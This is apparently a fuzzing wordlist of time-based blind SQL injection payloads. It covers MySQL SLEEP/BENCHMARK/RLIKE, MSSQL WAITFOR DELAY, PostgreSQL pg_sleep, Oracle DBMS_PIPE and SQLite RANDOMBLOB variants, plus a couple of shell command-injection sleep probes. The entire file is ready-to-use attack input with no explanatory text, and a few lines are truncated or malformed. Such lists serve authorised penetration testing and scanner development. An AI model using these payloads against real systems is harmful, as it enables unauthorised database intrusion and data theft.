sleep(10)#
(sleep 10)--
(sleep 10)
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10*1),0))XOR'Z
(SELECT * FROM (SELECT(SLEEP(10)))YYYY)
1 and sleep 10--
1 and sleep 10
1 and sleep(10)--
' and sleep 10 and '1'='1
or sleep 10--
or sleep 10
or sleep(10)--
or sleep(10)#
%20'sleep%20100'
%20$(sleep%20100)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY) AND '1337'='1337
RLIKE SLEEP(10)--
' RLIKE SLEEP(10)--
' RLIKE SLEEP(10)-- 1337
" RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10)-- 1337
') RLIKE SLEEP(10) AND ('1337'='1337
')) RLIKE SLEEP(10) AND (('1337'='1337
'))) RLIKE SLEEP(10) AND ((('1337'='1337
) RLIKE SLEEP(10)-- 1337
) RLIKE SLEEP(10) AND (1337=1337
' AND ELT(1337=1337,SLEEP(10))--
' AND ELT(1337=1337,SLEEP(10))-- 1337
" AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10))-- 1337
') AND ELT(1337=1337,SLEEP(10)) AND ('1337'='1337
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))--
' AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
" AND 1337=BENCHMARK(5000000,MD5(0x774c5341))-- 1337
') AND =BENCHMARK(5000000,MD5(0x774c5341))--
;waitfor delay '0:0:10'--
';WAITFOR DELAY '0:0:10'--
);waitfor delay '0:0:10'--
';waitfor delay '0:0:10'--
";waitfor delay '0:0:10'--
');waitfor delay '0:0:10'--
");waitfor delay '0:0:10'--
));waitfor delay '0:0:10'--
'));waitfor delay '0:0:10'--
"));waitfor delay '0:0:10'--
") IF (1=1) WAITFOR DELAY '0:0:10'--
";SELECT pg_sleep(10);
;SELECT pg_sleep(10);
and SELECT pg_sleep(10);
1 SELECT pg_sleep(10);
or SELECT pg_sleep(10);
(SELECT pg_sleep(10))
pg_sleep(10)--
1 or pg_sleep(10)--
" or pg_sleep(10)--
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND (1337=1337
SAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND (1337=1337
(sleep(10))--
(sleep(10))
";sleep 10--
";sleep 10
";sleep(10)--
";sleep(10)
ORDER BY SLEEP(10)
ORDER BY SLEEP(10)--
ORDER BY SLEEP(10)#
AND (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
OR (SELECT 1337 FROM (SELECT(SLEEP(10)))YYYY)-- 1337
RANDOMBLOB(500000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
